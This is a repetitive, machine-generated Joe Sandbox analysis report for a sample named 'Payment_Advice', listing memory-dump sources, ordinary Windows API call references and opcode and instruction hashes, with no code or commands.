                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: e545a77cfbb902f967d8588c6301e8d603fa9df60d1f7889228616cd367a9e8b
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: e545a77cfbb902f967d8588c6301e8d603fa9df60d1f7889228616cd367a9e8b
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 03bf940733d9f0fbf44504780eb2a3d9b52c9f0682f8858d84537a4fade24b23
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: 03bf940733d9f0fbf44504780eb2a3d9b52c9f0682f8858d84537a4fade24b23
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 9373bef018d65071d67d7ef5b5ebb5016fec6a7bf5398a2ca7c2f6a24891f4a8
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: 9373bef018d65071d67d7ef5b5ebb5016fec6a7bf5398a2ca7c2f6a24891f4a8
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 370edf4aaf6f82a2e96f4df348c10203cd8a1784495e52bc78df4be340762711
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: 370edf4aaf6f82a2e96f4df348c10203cd8a1784495e52bc78df4be340762711
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Q
• API String ID: 1269201914-2173417064
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Q
• API String ID: 1269201914-2173417064
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: Q
• API String ID: 1269201914-2173417064
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: (Q
• API String ID: 1269201914-982174220
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: (Q
• API String ID: 1269201914-982174220
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: FvnQ
• API String ID: 1269201914-3908200080
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: (Q
• API String ID: 1269201914-982174220
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: FvnQ
• API String ID: 1269201914-3908200080
Uniqueness

Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
  • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
  • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: FvnQ
                                                                                                    • API String ID: 1269201914-3908200080
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0052B7BB: GetOEMCP.KERNEL32(00000000,?,?,0052BA44,?), ref: 0052B7E6
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0052BA89,?,00000000), ref: 0052BC64
• GetCPInfo.KERNEL32(00000000,0052BA89,?,?,?,0052BA89,?,00000000), ref: 0052BC77
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00509A50,?,?,00000000,?,?,00508CBC,?), ref: 00509BAB
• GetLastError.KERNEL32(?,00000000,00508411,-00009570,00000000,000007F3), ref: 00509BB6
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00501E55
  • Part of subcall function 00503BBA: __EH_prolog.LIBCMT ref: 00503BBF
• _wcslen.LIBCMT ref: 00501EFD
Similarity
• API ID: H_prolog$_wcslen
• String ID:
• API String ID: 2838827086-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,005073BC,?,?,?,00000000), ref: 00509DBC
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00509E70
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00509F27,?,?,0050771A), ref: 005096E6
• CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00509F27,?,?,0050771A), ref: 00509716
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00509EC7
• GetLastError.KERNEL32 ref: 00509ED4
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00528E75
  • Part of subcall function 00528E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
• HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00541098,005017CE,?,?,00000007,?,?,?,005013D6,?,00000000), ref: 00528EB1
Similarity
• API ID: Heap$AllocAllocate_free
• String ID:
• API String ID: 2447670028-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(?,?), ref: 005110AB
• GetProcessAffinityMask.KERNEL32(00000000), ref: 005110B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                    • String ID:
                                                                                                    • API String ID: 1231390398-0
                                                                                                    • Opcode ID: 3d9056ddbe1e057733116335ae4e99ea7498da68fff70b71caf92abc783d16ab
                                                                                                    • Instruction ID: 8d9c9d8967f926d38def09e43c4a92c8b90208255a29b9b0c1adbf2c113277dc
                                                                                                    • Opcode Fuzzy Hash: 3d9056ddbe1e057733116335ae4e99ea7498da68fff70b71caf92abc783d16ab
                                                                                                    • Instruction Fuzzy Hash: 03E09236F00545A7DF0D87A49C0D9EB7ADDFA5824431041F9E603D7201F934DEC54664
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A501
                                                                                                      • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A532
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: 7707ca0b14e516cb9638609f0862caf9a1d5c88ab5a468263cb2de5cd538427b
                                                                                                    • Instruction ID: abbeb92f6f28b564555ca355584c8c35834485cea0b0baf41e7313d228320369
                                                                                                    • Opcode Fuzzy Hash: 7707ca0b14e516cb9638609f0862caf9a1d5c88ab5a468263cb2de5cd538427b
                                                                                                    • Instruction Fuzzy Hash: 86F0303224020ABBEF115F60DC49FDE3B6CBF14385F448051B945D51A0DB71DAD9EA50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641,000000FF), ref: 0050A1F1
                                                                                                      • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0050977F,?,?,005095CF,?,?,?,?,?,00532641), ref: 0050A21F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2643169976-0
                                                                                                    • Opcode ID: da81a5a80774580fa6a44cabb8f5f92fc4211966387ff793bce28f5d20b22efa
                                                                                                    • Instruction ID: 071502cc6d040be4851130bd8edc33c15a75c2af61efeeca5927a74077e210c5
                                                                                                    • Opcode Fuzzy Hash: da81a5a80774580fa6a44cabb8f5f92fc4211966387ff793bce28f5d20b22efa
                                                                                                    • Instruction Fuzzy Hash: 05E0923524020A7BEB015F60DC89FDD3B9CBF183C6F484021B944D2190EB61DEC8EB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00532641,000000FF), ref: 0051ACB0
                                                                                                    • OleUninitialize.OLE32(?,?,?,?,00532641,000000FF), ref: 0051ACB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3856339756-0
                                                                                                    • Opcode ID: d45736560ee21fd8f5e79441f0bba09e58707953734566be01a1636013314ab2
                                                                                                    • Instruction ID: b5b7c805935911e711f294a6a411999062ef21ff4c72fed461662edd91f359df
                                                                                                    • Opcode Fuzzy Hash: d45736560ee21fd8f5e79441f0bba09e58707953734566be01a1636013314ab2
                                                                                                    • Instruction Fuzzy Hash: 81E06D76604A50EFCB009B5DDC06B4AFFA8FB89F20F00426AF416D37A0CB74A840CA90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0050A23A,?,0050755C,?,?,?,?), ref: 0050A254
                                                                                                      • Part of subcall function 0050BB03: _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0050A23A,?,0050755C,?,?,?,?), ref: 0050A280
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2673547680-0
                                                                                                    • Opcode ID: a07fe7bf02aeb7fd1685134665fc3d957d64eee3ed47553f691cf65f9728c492
                                                                                                    • Instruction ID: 361a74942870d37aec692f5c4b1099640f5660f40e306f7a28fa1d916669c560
                                                                                                    • Opcode Fuzzy Hash: a07fe7bf02aeb7fd1685134665fc3d957d64eee3ed47553f691cf65f9728c492
                                                                                                    • Instruction Fuzzy Hash: 01E06D355001249BDB10AB64CC09BD97B98AB183E1F044261BD44E32D0D7709E888AA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 0051DEEC
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0051DF03
                                                                                                      • Part of subcall function 0051B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0051B579
                                                                                                      • Part of subcall function 0051B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0051B58A
                                                                                                      • Part of subcall function 0051B568: IsDialogMessageW.USER32(00010440,?), ref: 0051B59E
                                                                                                      • Part of subcall function 0051B568: TranslateMessage.USER32(?), ref: 0051B5AC
                                                                                                      • Part of subcall function 0051B568: DispatchMessageW.USER32(?), ref: 0051B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
